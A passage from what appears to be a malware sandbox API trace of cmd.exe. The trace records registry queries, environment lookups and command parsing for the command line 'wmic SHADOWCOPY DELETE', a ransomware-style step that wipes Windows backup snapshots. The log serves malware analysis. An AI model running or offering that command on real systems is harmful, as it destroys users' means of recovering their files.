SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0076.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.745] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0076.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.745] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0076.746] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.746] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0076.746] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.746] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0076.746] GetEnvironmentStringsW () returned 0x5e2030* [0076.747] GetProcessHeap () returned 0x5d0000 [0076.747] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xaca) returned 0x5e2b08 [0076.747] FreeEnvironmentStringsW (penv=0x5e2030) returned 1 [0076.747] GetProcessHeap () returned 0x5d0000 [0076.747] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x5e0c68 [0076.747] GetEnvironmentStringsW () returned 0x5e2030* [0076.747] GetProcessHeap () returned 0x5d0000 [0076.747] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xaca) returned 0x5e35e0 [0076.747] FreeEnvironmentStringsW (penv=0x5e2030) returned 1 [0076.747] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34e8f4 | out: phkResult=0x34e8f4*=0x68) returned 0x0 [0076.747] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x0, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x1, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, 
lpData=0x34e900*=0x1, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x0, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x40, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x40, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x40, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.748] RegCloseKey (hKey=0x68) returned 0x0 [0076.748] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34e8f4 | out: phkResult=0x34e8f4*=0x68) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x40, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x1, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x1, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.748] 
RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x0, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x9, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x9, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.749] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x9, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.749] RegCloseKey (hKey=0x68) returned 0x0 [0076.749] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c9 [0076.749] srand (_Seed=0x5e9c43c9) [0076.749] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c wmic SHADOWCOPY DELETE" [0076.749] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c wmic SHADOWCOPY DELETE" [0076.749] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.749] GetProcessHeap () returned 0x5d0000 [0076.749] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e2030 [0076.749] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5e2038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0076.750] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") 
returned 0x63 [0076.750] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.750] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.750] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0076.750] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0076.750] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0076.750] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0076.750] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0076.750] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0076.750] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0076.750] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0076.750] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0076.750] GetProcessHeap () returned 0x5d0000 [0076.750] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e2b08 | out: hHeap=0x5d0000) returned 1 [0076.750] GetEnvironmentStringsW () returned 0x5e2248* [0076.750] GetProcessHeap () returned 0x5d0000 [0076.750] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xae2) returned 0x5e4ba8 [0076.750] FreeEnvironmentStringsW (penv=0x5e2248) returned 1 [0076.750] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.750] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.750] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0076.751] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0076.751] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0076.751] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0076.751] _wcsicmp (_String1="KEYS", 
_String2="DATE") returned 7 [0076.751] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0076.751] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0076.751] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0076.751] GetProcessHeap () returned 0x5d0000 [0076.751] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x54) returned 0x5e5698 [0076.751] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x34f6c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.751] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x34f6c0, lpFilePart=0x34f6bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f6bc*="Desktop") returned 0x25 [0076.751] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.751] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34f43c | out: lpFindFileData=0x34f43c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5e1eb0 [0076.751] FindClose (in: hFindFile=0x5e1eb0 | out: hFindFile=0x5e1eb0) returned 1 [0076.751] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34f43c | out: lpFindFileData=0x34f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5e1eb0 [0076.752] FindClose (in: hFindFile=0x5e1eb0 | out: hFindFile=0x5e1eb0) returned 1 [0076.752] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0076.752] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34f43c | out: lpFindFileData=0x34f43c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe392fd80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xe392fd80, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5e1eb0 [0076.752] FindClose (in: hFindFile=0x5e1eb0 | out: hFindFile=0x5e1eb0) returned 1 [0076.752] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.752] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0076.752] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0076.752] GetProcessHeap () returned 0x5d0000 [0076.752] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4ba8 | out: hHeap=0x5d0000) returned 1 [0076.752] GetEnvironmentStringsW () returned 0x5e40b8* [0076.752] GetProcessHeap () returned 0x5d0000 [0076.752] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb36) returned 0x5e5ef8 [0076.753] FreeEnvironmentStringsW (penv=0x5e40b8) returned 1 [0076.753] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.753] GetProcessHeap () returned 0x5d0000 [0076.753] HeapFree (in: 
hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5698 | out: hHeap=0x5d0000) returned 1 [0076.753] GetProcessHeap () returned 0x5d0000 [0076.753] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400e) returned 0x5e6a38 [0076.753] GetProcessHeap () returned 0x5d0000 [0076.753] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3a) returned 0x5e1eb0 [0076.753] GetProcessHeap () returned 0x5d0000 [0076.753] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6a38 | out: hHeap=0x5d0000) returned 1 [0076.753] GetConsoleOutputCP () returned 0x1b5 [0076.754] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.754] GetUserDefaultLCID () returned 0x409 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a824950, cchData=8 | out: lpLCData=":") returned 2 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x34f800, cchData=128 | out: lpLCData="0") returned 2 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x34f800, cchData=128 | out: lpLCData="0") returned 2 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x34f800, cchData=128 | out: lpLCData="1") returned 2 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a824940, cchData=8 | out: lpLCData="/") returned 2 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a824d80, cchData=32 | out: lpLCData="Mon") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a824d40, cchData=32 | out: lpLCData="Tue") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a824d00, cchData=32 | out: lpLCData="Wed") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a824cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a824c80, cchData=32 | out: lpLCData="Fri") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, 
lpLCData=0x4a824c40, cchData=32 | out: lpLCData="Sat") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a824c00, cchData=32 | out: lpLCData="Sun") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a824930, cchData=8 | out: lpLCData=".") returned 2 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a824920, cchData=8 | out: lpLCData=",") returned 2 [0076.756] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0076.757] GetProcessHeap () returned 0x5d0000 [0076.757] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20c) returned 0x5e2dc0 [0076.757] GetConsoleTitleW (in: lpConsoleTitle=0x5e2dc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.758] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.758] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0076.758] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0076.758] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0076.758] GetProcessHeap () returned 0x5d0000 [0076.758] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400a) returned 0x5e6a38 [0076.758] GetProcessHeap () returned 0x5d0000 [0076.759] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6a38 | out: hHeap=0x5d0000) returned 1 [0076.759] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0076.759] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0076.759] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0076.759] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0076.759] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0076.759] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0076.759] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0076.759] GetProcessHeap () returned 0x5d0000 [0076.759] RtlAllocateHeap 
(HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e2fd8 [0076.759] GetProcessHeap () returned 0x5d0000 [0076.759] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5e3038 [0076.760] GetProcessHeap () returned 0x5d0000 [0076.760] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5e3058 [0076.761] GetConsoleTitleW (in: lpConsoleTitle=0x34f4f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.761] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0076.761] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0076.761] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0076.761] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0076.761] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0076.761] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0076.761] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0076.761] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0076.761] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0076.761] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0076.761] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0076.761] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0076.762] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0076.762] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0076.762] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0076.762] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0076.762] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0076.762] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0076.762] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0076.762] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0076.762] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0076.762] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0076.762] _wcsicmp (_String1="wmic", _String2="CLS") returned 
20 [0076.762] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0076.762] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0076.762] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0076.762] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0076.762] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0076.762] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0076.762] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0076.762] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0076.762] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0076.762] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0076.762] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0076.762] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0076.762] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0076.762] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0076.762] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0076.762] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0076.763] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0076.763] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0076.763] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0076.763] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0076.763] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0076.763] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0076.763] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0076.763] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0076.763] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0076.763] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0076.763] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0076.763] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0076.763] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0076.763] _wcsicmp (_String1="wmic", 
_String2="SET") returned 4 [0076.763] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0076.763] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0076.763] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0076.763] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0076.763] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0076.763] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0076.763] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0076.763] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0076.763] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0076.763] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0076.763] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0076.764] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0076.764] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0076.764] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0076.764] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0076.764] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0076.764] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0076.764] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0076.764] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0076.764] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0076.764] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0076.764] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0076.764] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0076.764] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0076.764] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0076.764] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0076.764] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0076.764] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0076.764] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0076.764] _wcsicmp 
(_String1="wmic", _String2="COLOR") returned 20 [0076.764] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0076.764] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0076.764] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0076.764] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0076.765] GetProcessHeap () returned 0x5d0000 [0076.765] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e3090 [0076.765] GetProcessHeap () returned 0x5d0000 [0076.765] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x38) returned 0x5e32a8 [0076.765] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20 [0076.765] GetProcessHeap () returned 0x5d0000 [0076.765] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x418) returned 0x5d07f0 [0076.765] SetErrorMode (uMode=0x0) returned 0x0 [0076.765] SetErrorMode (uMode=0x1) returned 0x0 [0076.765] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5d07f8, lpFilePart=0x34f018 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f018*="Desktop") returned 0x25 [0076.765] SetErrorMode (uMode=0x0) returned 0x1 [0076.765] GetProcessHeap () returned 0x5d0000 [0076.765] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5d07f0, Size=0x5e) returned 0x5d07f0 [0076.765] GetProcessHeap () returned 0x5d0000 [0076.765] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5d07f0) returned 0x5e [0076.766] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.766] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0076.766] GetProcessHeap () returned 0x5d0000 [0076.766] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x120) returned 0x5e32e8 [0076.766] GetProcessHeap () returned 0x5d0000 [0076.766] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, 
Size=0x238) returned 0x5d0858 [0077.105] GetProcessHeap () returned 0x5d0000 [0077.105] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5d0858, Size=0x122) returned 0x5d0858 [0077.105] GetProcessHeap () returned 0x5d0000 [0077.105] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5d0858) returned 0x122 [0077.105] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.105] GetProcessHeap () returned 0x5d0000 [0077.105] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe0) returned 0x5e3410 [0077.106] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e3410, Size=0x76) returned 0x5e3410 [0077.106] GetProcessHeap () returned 0x5d0000 [0077.106] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5e3410) returned 0x76 [0077.106] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.106] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.107] GetLastError () returned 0x2 [0077.107] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 